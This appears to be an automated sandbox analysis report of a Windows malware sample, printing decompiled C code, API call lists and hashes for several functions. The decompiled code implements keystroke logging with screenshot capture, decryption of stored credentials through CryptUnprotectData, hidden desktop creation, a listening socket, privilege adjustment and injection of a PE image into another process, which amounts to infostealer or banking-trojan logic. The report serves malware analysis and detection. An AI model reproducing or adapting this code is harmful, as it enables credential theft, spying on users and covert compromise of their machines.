Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CertStore$CertificatesCloseEnumExportHeapSystem$AllocCharFreeLowerOpenTime
String ID:
API String ID: 684085711-0
Opcode ID: 1e58c83791d193b1cbcc3a0a0896f35e6513bf11ec0e6c4075032da66c80952a
Instruction ID: 448241edfff27b0c3298db00503b323c6344b45310cfeb0d0f3498c3b54b0351
Opcode Fuzzy Hash: 1e58c83791d193b1cbcc3a0a0896f35e6513bf11ec0e6c4075032da66c80952a
Instruction Fuzzy Hash: 7C41B671308351AAD310DF65EC05BBBBBBCDB84755F40052EBA84E2290DA78DA45C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00423840, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 119
windowsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00423840(MSG* _a4) {
				void* _v536;
				char _v780;
				void* _v852;
				char _v864;
				short _v884;
				void* _v896;
				void* __edi;
				void* __esi;
				int _t25;
				signed int _t26;
				signed int _t29;
				MSG* _t42;
				intOrPtr* _t63;
				char* _t67;
				WCHAR* _t70;
				signed int _t72;
				void* _t74;

				_t74 = (_t72 & 0xfffffff8) - 0x374;
				_t42 = _a4;
				if(_t42 == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
					L20:
					return TranslateMessage(_t42);
				} else {
					_t25 = _t42->message;
					if(_t25 != 0x201) {
						__eflags = _t25 - 0x100;
						if(_t25 == 0x100) {
							__eflags = _t42->wParam - 0x1b;
							if(_t42->wParam != 0x1b) {
								_t26 = GetKeyboardState( &_v780);
								__eflags = _t26;
								if(_t26 != 0) {
									_t29 = ToUnicode(_t42->wParam, _t42->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
									__eflags = _t29;
									if(_t29 > 0) {
										__eflags = _t29 - 1;
										if(__eflags != 0) {
											if(__eflags > 0) {
												goto L18;
											} else {
												goto L17;
											}
										} else {
											__eflags = _t42->wParam - 8;
											if(_t42->wParam != 8) {
												L17:
												__eflags = _v884 - 0x20;
												if(_v884 >= 0x20) {
													L18:
													__eflags = 0;
													 *((short*)(_t74 + 0x10 + _t29 * 2)) = 0;
													_push( &_v884);
													goto L19;
												}
											} else {
												_push(0x40397c);
												L19:
												E00423620();
											}
										}
									}
								}
							}
						}
						goto L20;
					} else {
						EnterCriticalSection(0x42ede8);
						if( *0x42ede0 > 0) {
							 *0x42ede0 =  *0x42ede0 + 0xffff;
							_t67 =  &_v864;
							E00424100(2, _t67);
							_push(0x1f4);
							_push(0x1e);
							_push(_t67);
							_t63 = E0041E910();
							if(_t63 != 0) {
								E00424100(0, _t74 + 0x3c);
								E00424100(1,  &_v884);
								_t70 =  *0x42e8f4;
								if(_t70 == 0) {
									_t70 =  &_v884;
								}
								E00411D10( *0x42eb68, 0x104, _t74 + 0x188, _t74 + 0x48);
								E0040D7F0(_t63, _t74 + 0x188);
								 *((intOrPtr*)( *((intOrPtr*)( *_t63 + 8))))(_t63, _t70,  *0x42eb68, GetTickCount());
							}
						}
						LeaveCriticalSection(0x42ede8);
						return TranslateMessage(_t42);
					}
				}
			}

0x00423846
0x0042384d
0x00423854
0x004239b2
0x004239bf
0x00423870
0x00423870
0x00423878
0x0042393f
0x00423944
0x00423946
0x0042394a
0x00423951
0x00423957
0x00423959
0x0042397b
0x00423981
0x00423983
0x00423985
0x00423988
0x00423997
0x00000000
0x00000000
0x00000000
0x00000000
0x0042398a
0x0042398a
0x0042398e
0x00423999
0x00423999
0x0042399f
0x004239a1
0x004239a1
0x004239a7
0x004239ac
0x00000000
0x004239ac
0x00423990
0x00423990
0x004239ad
0x004239ad
0x004239ad
0x0042398e
0x00423988
0x00423983
0x00423959
0x0042394a
0x00000000
0x0042387e
0x00423883
0x00423891
0x0042389c
0x004238a3
0x004238ac
0x004238b1
0x004238b6
0x004238ba
0x004238c0
0x004238c4
0x004238cc
0x004238da
0x004238df
0x004238e7
0x004238e9
0x004238e9
0x0042390c
0x00423917
0x00423922
0x00423922
0x004238c4
0x00423929
0x0042393c
0x0042393c
0x00423878

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00423862
EnterCriticalSection.KERNEL32(0042EDE8), ref: 00423883
GetTickCount.KERNEL32 ref: 004238ED
LeaveCriticalSection.KERNEL32(0042EDE8), ref: 00423929
TranslateMessage.USER32(?), ref: 00423930

Part of subcall function 0041E910: VirtualProtect.KERNEL32(00409C70,000005DC,00000004,?,?,00000000,?,00000000), ref: 0041E92E
Part of subcall function 0041E910: LoadLibraryA.KERNEL32 ref: 0041E95D
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041E96D
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041E979
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041E985
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041E991
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041E99D
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041E9A9
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041E9B5
Part of subcall function 0041E910: LoadLibraryA.KERNEL32(ole32.dll), ref: 0041EA04
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041EA10
Part of subcall function 0041E910: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041EA23
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041EA2D
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041EA37
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041EA43
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041EA4F
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041EA5B
Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041EA67

GetKeyboardState.USER32(?), ref: 00423951
ToUnicode.USER32 ref: 0042397B
TranslateMessage.USER32(?), ref: 004239B3

Strings

, xrefs: 00423999

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$CriticalMessageSectionTranslate$CountEnterKeyboardLeaveObjectProtectSingleStateTickUnicodeVirtualWait
String ID:
API String ID: 3249436153-3916222277
Opcode ID: a7bad5132c88083581c8edb69458db7cb2c7778cffee6eaab936e3dc5be3433e
Instruction ID: 76b4f90217f239abd592522bf67283ccb948a1775e3e3ae68731173d321cd955
Opcode Fuzzy Hash: a7bad5132c88083581c8edb69458db7cb2c7778cffee6eaab936e3dc5be3433e
Instruction Fuzzy Hash: 614107B230022157D720EF15EC49BAB73B8EB85701F84442EF945972A1DBBCD984C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041FB50, Relevance: 13.7, APIs: 9, Instructions: 202
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E0041FB50(void* __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v104;
				char _v128;
				char _v144;
				char _v156;
				void* _v160;
				signed int _v164;
				intOrPtr _v168;
				char _v176;
				void* _v180;
				void* _v184;
				signed int _v188;
				char* _v192;
				intOrPtr _v196;
				void* _v200;
				intOrPtr _v201;
				intOrPtr _v204;
				signed int _v208;
				signed int _v221;
				intOrPtr _v228;
				void* __edi;
				void* __esi;
				signed int _t53;
				signed int _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				char* _t57;
				signed int _t65;
				signed int _t69;
				void* _t72;
				signed int _t75;
				signed int _t76;
				long _t77;
				void* _t79;
				signed int* _t84;
				void* _t92;
				intOrPtr* _t101;
				char* _t109;
				signed int _t112;
				signed int _t119;
				char* _t120;
				void* _t121;
				intOrPtr* _t122;
				char* _t125;
				intOrPtr _t129;
				signed int* _t130;
				signed int _t142;

				_t132 = __eflags;
				_t130 =  &_v208;
				_t129 = _a4;
				_t118 = __eax;
				_t92 = E0041FAC0(0x4c, __eax, __eflags, _t129);
				_v204 = E0041FAC0(0x4f, _t118, _t132, _t129);
				_t121 = E0041FAC0(0x50, _t118, _t132, _t129);
				_v180 = _t121;
				_v208 = E0041FAC0(0x4d, _t118, _t132, _t129);
				_t53 = E0041FAC0(0x4e, _t118, _t132, _t129);
				_t119 = _t53;
				_t54 = _t53 & 0xffffff00 | _t92 != 0x00000000;
				_v208 = _t119;
				_v221 = _t54;
				if(_t54 == 0) {
					L34:
					_t122 = __imp__#6;
					if(_t92 != 0) {
						 *_t122(_t92);
					}
					_t55 = _v196;
					if(_t55 != 0) {
						 *_t122(_t55);
					}
					_t56 = _v168;
					if(_t56 != 0) {
						 *_t122(_t56);
					}
					_t57 = _v192;
					if(_t57 != 0) {
						 *_t122(_t57);
					}
					if(_t119 != 0) {
						 *_t122(_t119);
					}
					return _v201;
				} else {
					_v184 = 0;
					if(_t121 != 0) {
						_v180 = E00411140(_t121);
					} else {
						_v180 = 0;
					}
					_v200 = 0;
					if(_v196 != 0) {
						E00424100(0x44,  &_v156);
						_push(_v196);
						E00411D10(_v196, 0xc,  &_v128,  &_v156);
						_t130 =  &(_t130[2]);
						_v184 = E00411140( &_v128);
					}
					_t65 = 0;
					if(_t119 == 0) {
						L22:
						E00424100(0x4b,  &_v104);
						E00424100(0x54,  &_v144);
						_t120 = _v200;
						if(_t120 == 0) {
							_t120 = 0x4032e8;
						}
						_t125 = _v192;
						if(_t125 == 0) {
							_t125 = 0x4032e8;
						}
						_t109 = 0x4032e8;
						if(_v180 != 0) {
							_t109 =  &_v144;
						}
						_t101 =  *_a12;
						_t69 = 0;
						if(_t101 == 0 ||  *_t101 == 0) {
							L31:
							_push(_t120);
							_push(_t125);
							_push(_t109);
							_push(_v184);
							_push(_t92);
							_push(_t129);
							_push( &_v104);
							_push(_t69);
							E00411E10(_a12, _t152);
							_t72 = _v200;
							if(_t72 != 0) {
								HeapFree( *0x42e6d4, 0, _t72);
							}
							_t119 = _v188;
							goto L34;
						} else {
							do {
								_t69 = _t69 + 1;
								_t152 =  *((short*)(_t101 + _t69 * 2));
							} while ( *((short*)(_t101 + _t69 * 2)) != 0);
							goto L31;
						}
					}
					if( *_t119 == 0) {
						L10:
						if(_t65 > 1) {
							_t112 = _t65 & 0x80000001;
							if(_t112 < 0) {
								_t112 = (_t112 - 0x00000001 | 0xfffffffe) + 1;
								_t142 = _t112;
							}
							if(_t142 == 0) {
								asm("cdq");
								_t75 = _t65 - _t112;
								_t76 = _t75 >> 1;
								_v164 = _t76;
								if(_t75 != 0) {
									_t77 = _t76 + 4;
									__eflags = _t77;
									_t79 = HeapAlloc( *0x42e6d4, 8, _t77);
								} else {
									_t79 = 0;
								}
								_v160 = _t79;
								if(_t79 != 0) {
									if(E004112A0(_t119, _t79) != 0) {
										_t84 =  &_v164;
										__imp__CryptUnprotectData(_t84, 0, _a8, 0, 0, 0,  &_v176);
										if(_t84 == 1) {
											_v228 = E00410D20(_v200);
											LocalFree(_v200);
										}
									}
									E004107C0(_v160);
								}
							}
						}
						goto L22;
					} else {
						do {
							_t65 = _t65 + 1;
						} while ( *((short*)(_t119 + _t65 * 2)) != 0);
						goto L10;
					}
				}
			}

0x0041fb50
0x0041fb50
0x0041fb58
0x0041fb61
0x0041fb74
0x0041fb81
0x0041fb8a
0x0041fb92
0x0041fba1
0x0041fba5
0x0041fbae
0x0041fbb0
0x0041fbb3
0x0041fbb7
0x0041fbbd
0x0041fd75
0x0041fd75
0x0041fd7d
0x0041fd80
0x0041fd80
0x0041fd82
0x0041fd88
0x0041fd8b
0x0041fd8b
0x0041fd8d
0x0041fd93
0x0041fd96
0x0041fd96
0x0041fd98
0x0041fd9e
0x0041fda1
0x0041fda1
0x0041fda5
0x0041fda8
0x0041fda8
0x0041fdb8
0x0041fbc3
0x0041fbc3
0x0041fbc9
0x0041fbd8
0x0041fbcb
0x0041fbcb
0x0041fbcb
0x0041fbe1
0x0041fbe9
0x0041fbf4
0x0041fbff
0x0041fc0a
0x0041fc0f
0x0041fc19
0x0041fc19
0x0041fc1d
0x0041fc21
0x0041fcd6
0x0041fcdf
0x0041fced
0x0041fcf2
0x0041fcf8
0x0041fcfa
0x0041fcfa
0x0041fcff
0x0041fd05
0x0041fd07
0x0041fd07
0x0041fd11
0x0041fd16
0x0041fd18
0x0041fd18
0x0041fd23
0x0041fd25
0x0041fd29
0x0041fd38
0x0041fd3c
0x0041fd3d
0x0041fd3e
0x0041fd3f
0x0041fd40
0x0041fd41
0x0041fd49
0x0041fd4a
0x0041fd52
0x0041fd57
0x0041fd60
0x0041fd6b
0x0041fd6b
0x0041fd71
0x00000000
0x0041fd30
0x0041fd30
0x0041fd30
0x0041fd31
0x0041fd31
0x00000000
0x0041fd30
0x0041fd29
0x0041fc2a
0x0041fc38
0x0041fc3b
0x0041fc43
0x0041fc49
0x0041fc4f
0x0041fc4f
0x0041fc4f
0x0041fc50
0x0041fc56
0x0041fc57
0x0041fc59
0x0041fc5b
0x0041fc5f
0x0041fc65
0x0041fc65
0x0041fc71
0x0041fc61
0x0041fc61
0x0041fc61
0x0041fc77
0x0041fc7d
0x0041fc8a
0x0041fca1
0x0041fca6
0x0041fcaf
0x0041fcc3
0x0041fcc7
0x0041fcc7
0x0041fcaf
0x0041fcd1
0x0041fcd1
0x0041fc7d
0x0041fc50
0x00000000
0x0041fc30
0x0041fc30
0x0041fc30
0x0041fc31
0x00000000
0x0041fc30
0x0041fc2a

APIs

HeapAlloc.KERNEL32(?,00000008,-00000004,?,?), ref: 0041FC71
CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 0041FCA6
LocalFree.KERNEL32(?), ref: 0041FCC7
HeapFree.KERNEL32(?,00000000,?,?), ref: 0041FD6B
SysFreeString.OLEAUT32(00000000), ref: 0041FD80
SysFreeString.OLEAUT32(?), ref: 0041FD8B
SysFreeString.OLEAUT32(?), ref: 0041FD96
SysFreeString.OLEAUT32(?), ref: 0041FDA1
SysFreeString.OLEAUT32(00000000), ref: 0041FDA8

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$String$Heap$AllocCryptDataLocalUnprotect
String ID:
API String ID: 2178157609-0
Opcode ID: 02aa8935d25c527dfd615f59a30a18287007b6b848499b52ce5bfa56c3ba6bd3
Instruction ID: 3fa4bbe6a9c0c058f76f42d5f2f3c658b6bcc88dfaed2eaf79a188984f9c7ae6
Opcode Fuzzy Hash: 02aa8935d25c527dfd615f59a30a18287007b6b848499b52ce5bfa56c3ba6bd3
Instruction Fuzzy Hash: 3661B2716043019BD7109B65D841BABB7E9ABC4704F04493FF945E7390EB7CEC8A8B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A370, Relevance: 10.6, APIs: 7, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A370(WCHAR* __eax, void* __eflags) {
				char _v16;
				char _v32;
				struct HWINSTA__* _v36;
				void* __esi;
				long _t8;
				WCHAR* _t13;
				void* _t21;
				WCHAR* _t23;
				WCHAR* _t24;
				struct HDESK__* _t25;
				struct HWINSTA__* _t27;

				_t24 =  &_v32;
				_t22 = 0xcc;
				_t23 = __eax;
				_t21 = 0;
				E00424100(0xcc, _t24);
				_t8 = OpenWindowStationW(_t24, 0, 0x10000000);
				_t27 = _t8;
				if(_t27 != 0) {
					L2:
					_v36 = GetProcessWindowStation();
					if(E0041A270(_t22, _t27) == 0) {
						L10:
						CloseWindowStation(_t27);
						L11:
						return _t21;
					}
					if(_t23 == 0) {
						_t23 =  &_v16;
						_t22 = 0xcd;
						E00424100(0xcd, _t23);
					}
					_t13 = OpenDesktopW(_t23, 0, 0, 0x10000000);
					_t25 = _t13;
					if(_t25 != 0) {
						L7:
						_t21 = E0041A2F0(_t22, _t25);
						CloseDesktop(_t25);
						if(_t21 != 0) {
							goto L10;
						}
						goto L8;
					} else {
						_t25 = CreateDesktopW(_t23, _t13, _t13, _t13, 0x10000000, _t13);
						if(_t25 == 0) {
							L8:
							_t16 = _v36;
							if(_v36 != 0) {
								E0041A270(_t22, _t16);
							}
							goto L10;
						}
						goto L7;
					}
				}
				_t22 = _t24;
				_t27 = CreateWindowStationW(_t24, _t8, 0x10000000, _t8);
				if(_t27 == 0) {
					goto L11;
				}
				goto L2;
			}

0x0041a377
0x0041a37b
0x0041a380
0x0041a382
0x0041a384
0x0041a393
0x0041a399
0x0041a39d
0x0041a3b5
0x0041a3bc
0x0041a3c7
0x0041a42a
0x0041a42b
0x0041a434
0x0041a43a
0x0041a43a
0x0041a3cb
0x0041a3cd
0x0041a3d3
0x0041a3d8
0x0041a3d8
0x0041a3e7
0x0041a3ed
0x0041a3f1
0x0041a409
0x0041a410
0x0041a412
0x0041a41a
0x00000000
0x00000000
0x00000000
0x0041a3f3
0x0041a403
0x0041a407
0x0041a41c
0x0041a41c
0x0041a422
0x0041a425
0x0041a425
0x00000000
0x0041a422
0x00000000
0x0041a407
0x0041a3f1
0x0041a3a6
0x0041a3af
0x0041a3b3
0x00000000
0x00000000
0x00000000

APIs

OpenWindowStationW.USER32 ref: 0041A393
CreateWindowStationW.USER32 ref: 0041A3A9
GetProcessWindowStation.USER32(?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A3B5
OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0041A3E7
CreateDesktopW.USER32 ref: 0041A3FD
CloseDesktop.USER32(00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A412
CloseWindowStation.USER32(00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A42B

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: StationWindow$Desktop$CloseCreateOpen$Process
String ID:
API String ID: 951938242-0
Opcode ID: 0879c1f49e4e35b45f5cc03f1e87af6f09d6f7d153760ce8be123f91f879de30
Instruction ID: 6c593244c0beb0c9b2a164ed78805d663e8c8c10bf4dfb06ee6ac70a893f95db
Opcode Fuzzy Hash: 0879c1f49e4e35b45f5cc03f1e87af6f09d6f7d153760ce8be123f91f879de30
Instruction Fuzzy Hash: 7711BE756423216BE620AB756D08BEB379CDB55794F00002AFD01F3362EA6CEC9845AE

Uniqueness

Uniqueness Score: -1.00%

Function 00414F40, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76
networkCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00414F40(short __edx) {
				signed int _t13;
				long _t16;
				signed int _t17;
				intOrPtr* _t27;
				short _t30;
				intOrPtr* _t35;
				signed int _t36;
				void* _t37;
				void* _t38;

				_t30 = __edx;
				if(__edx == 2 || __edx == 0x17) {
					E00410870(_t38 + 0x18, _t38 + 0x18, 0, 0x80);
					_t35 = __imp__#23;
					_t27 = __imp__#2;
					 *((short*)(_t38 + 0x10)) = _t30;
					_t37 = 0x9c40;
					do {
						_t16 = GetTickCount();
						if(_t16 !=  *0x42dd08) {
							 *0x42dd08 = _t16;
							E00412320(_t16);
						}
						_t17 = E00412360();
						asm("rol dx, 0x8");
						 *((short*)(_t38 + 0x1a)) = _t17 % 0x7531 + 0x2710;
						_t13 =  *_t35( *(_t38 + 0x18) & 0x0000ffff, 1, 6);
						_t36 = _t13;
						if(_t36 == 0xffffffff) {
							goto L9;
						} else {
							_t13 =  *_t27(_t36, _t38 + 0x10, ((0 |  *((short*)(_t38 + 0x10)) != 0x00000002) - 0x00000001 & 0xfffffff4) + 0x1c);
							if(_t13 != 0) {
								L8:
								__imp__#3(_t36);
								goto L9;
							} else {
								__imp__#13(_t36, 0x7fffffff);
								if(_t13 == 0) {
									return _t36;
								} else {
									goto L8;
								}
							}
						}
						goto L12;
						L9:
						_t37 = _t37 - 1;
					} while (_t37 > 0);
					goto L10;
				} else {
					L10:
					return _t13 | 0xffffffff;
				}
				L12:
			}

0x00414f40
0x00414f4d
0x00414f64
0x00414f69
0x00414f6f
0x00414f75
0x00414f7a
0x00414f80
0x00414f80
0x00414f8c
0x00414f8e
0x00414f93
0x00414f93
0x00414f98
0x00414fb0
0x00414fb4
0x00414fbf
0x00414fc1
0x00414fc6
0x00000000
0x00414fc8
0x00414fe1
0x00414fe5
0x00414ff7
0x00414ff8
0x00000000
0x00414fe7
0x00414fed
0x00414ff5
0x00415021
0x00000000
0x00000000
0x00000000
0x00414ff5
0x00414fe5
0x00000000
0x00414ffe
0x00414ffe
0x00414fff
0x00000000
0x00415007
0x00415007
0x00415014
0x00415014
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00414F80
socket.WS2_32(?,00000001,00000006), ref: 00414FBF
bind.WS2_32(00000000,00000002,-0000001D), ref: 00414FE1
listen.WS2_32(00000000,7FFFFFFF), ref: 00414FED
closesocket.WS2_32(00000000), ref: 00414FF8

Strings

p0u, xrefs: 00414FF8

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTickbindclosesocketlistensocket
String ID: p0u
API String ID: 3574796091-1742372003
Opcode ID: 09c64914b0641a9b0747c175492a10d01bfe2c46d0d0c3c649c4dfb6fa714802
Instruction ID: a931c02b9080aca10abb5b8ee5c803272c3e439f9c55c05de76d6a7fa06d553f
Opcode Fuzzy Hash: 09c64914b0641a9b0747c175492a10d01bfe2c46d0d0c3c649c4dfb6fa714802
Instruction Fuzzy Hash: BD113A3161470657D320AB38EC456EF7798FFD13A0F444A26F960D72E0EB7C888643A9

Uniqueness

Uniqueness Score: -1.00%

Function 004129B0, Relevance: 10.6, APIs: 7, Instructions: 55
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004129B0(WCHAR* _a4) {
				intOrPtr _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				long _t22;

				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v20) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v20) != 0) {
					_t22 = 0;
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					if(LookupPrivilegeValueW(0, _a4,  &(_v16.Privileges)) != 0 && AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0) != 0 && GetLastError() == 0) {
						_t22 = 1;
					}
					CloseHandle(_v20);
					return _t22;
				} else {
					return 0;
				}
			}

0x004129cc
0x004129f6
0x004129f8
0x00412a00
0x00412a10
0x00412a38
0x00412a38
0x00412a3f
0x00412a4b
0x004129e1
0x004129e7
0x004129e7

APIs

GetCurrentThread.KERNEL32 ref: 004129BD
OpenThreadToken.ADVAPI32(00000000), ref: 004129C4
OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 004129D7
LookupPrivilegeValueW.ADVAPI32 ref: 00412A08
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00412A24
GetLastError.KERNEL32 ref: 00412A2E
CloseHandle.KERNEL32(?), ref: 00412A3F

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
String ID:
API String ID: 2724707430-0
Opcode ID: 907a642ead2b95575d4c021f54c57a4bc6693c7d9728fd2ed30e4c1413f6bdb8
Instruction ID: 458083cc022ed9835a1fd4360ea37bccc42e6c746427ca93e34fb8b723c228c0
Opcode Fuzzy Hash: 907a642ead2b95575d4c021f54c57a4bc6693c7d9728fd2ed30e4c1413f6bdb8
Instruction Fuzzy Hash: E811A5B13403016FE6109F60DE4AF9777A8AB94B04F008519F945E61E1E7B8D845D73A

Uniqueness

Uniqueness Score: -1.00%

Function 00417150, Relevance: 9.1, APIs: 6, Instructions: 117
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417150(void* __eax, void* _a4) {
				long _v4;
				intOrPtr _v8;
				void* _v12;
				void* _v13;
				void* _t36;
				intOrPtr _t45;
				signed int _t46;
				long _t50;
				signed int _t51;
				signed int _t53;
				intOrPtr _t56;
				intOrPtr* _t57;
				signed int _t62;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t65;
				void* _t68;
				unsigned int _t71;
				void* _t74;

				_t68 = __eax;
				_t63 =  *((intOrPtr*)(__eax + 0x3c));
				_t50 =  *(_t63 + __eax + 0x50);
				_t64 = _t63 + __eax;
				_v4 = _t50;
				_v13 = 0;
				if(IsBadReadPtr(__eax, _t50) == 0) {
					_t36 = VirtualAllocEx(_a4, 0, _t50, 0x3000, 0x40);
					_v12 = _t36;
					if(_t36 != 0) {
						if(_t50 == 0) {
							L18:
							VirtualFreeEx(_a4, _v12, 0, 0x8000);
							_v12 = 0;
						} else {
							_t74 = HeapAlloc( *0x42e6d4, 0, _t50 + 4);
							if(_t74 == 0) {
								goto L18;
							} else {
								E00410820(_t74, _t68, _t50);
								if( *((intOrPtr*)(_t64 + 0xa4)) <= 0) {
									L16:
									_t51 = _v13;
								} else {
									_t56 =  *((intOrPtr*)(_t64 + 0xa0));
									if(_t56 == 0) {
										goto L16;
									} else {
										_t65 =  *((intOrPtr*)(_t64 + 0x34));
										_t57 = _t56 + _t74;
										_t53 = _v12 - _t65;
										_v8 = _t68 - _t65;
										while( *_t57 != 0) {
											_t45 =  *((intOrPtr*)(_t57 + 4));
											if(_t45 >= 8) {
												_t71 = _t45 - 8 >> 1;
												_t62 = 0;
												if(_t71 != 0) {
													do {
														_t46 =  *(_t57 + 8 + _t62 * 2) & 0x0000ffff;
														if(_t46 != 0) {
															 *((intOrPtr*)((_t46 & 0x00000fff) +  *_t57 + _t74)) =  *((intOrPtr*)((_t46 & 0x00000fff) +  *_t57 + _t74)) + _t53 - _v8;
														}
														_t62 = _t62 + 1;
													} while (_t62 < _t71);
												}
											}
											_t57 = _t57 +  *((intOrPtr*)(_t57 + 4));
										}
										_t51 = _t53 & 0xffffff00 | WriteProcessMemory(_a4, _v12, _t74, _v4, 0) != 0x00000000;
									}
								}
								HeapFree( *0x42e6d4, 0, _t74);
								if(_t51 == 0) {
									goto L18;
								}
							}
						}
					}
					return _v12;
				} else {
					return 0;
				}
			}

0x00417156
0x00417158
0x0041715b
0x0041715f
0x00417163
0x00417167
0x00417174
0x00417190
0x00417196
0x0041719c
0x004171a5
0x00417271
0x00417282
0x00417288
0x004171ab
0x004171be
0x004171c2
0x00000000
0x004171c8
0x004171cb
0x004171d7
0x0041725a
0x0041725a
0x004171dd
0x004171dd
0x004171e5
0x00000000
0x004171e7
0x004171e7
0x004171f0
0x004171f2
0x004171f7
0x004171fb
0x00417200
0x00417206
0x0041720b
0x0041720d
0x00417212
0x00417214
0x00417214
0x0041721c
0x0041722b
0x0041722b
0x0041722e
0x0041722f
0x00417214
0x00417212
0x00417233
0x00417236
0x00417255
0x00417255
0x004171e5
0x00417267
0x0041726f
0x00000000
0x00000000
0x0041726f
0x004171c2
0x00417290
0x0041729b
0x00417178
0x0041717e
0x0041717e

APIs

IsBadReadPtr.KERNEL32 ref: 0041716C
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00417190
HeapAlloc.KERNEL32(?,00000000,?,00000000), ref: 004171B8
WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,00000000,?,?), ref: 0041724D
HeapFree.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00417267
VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00000000), ref: 00417282

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
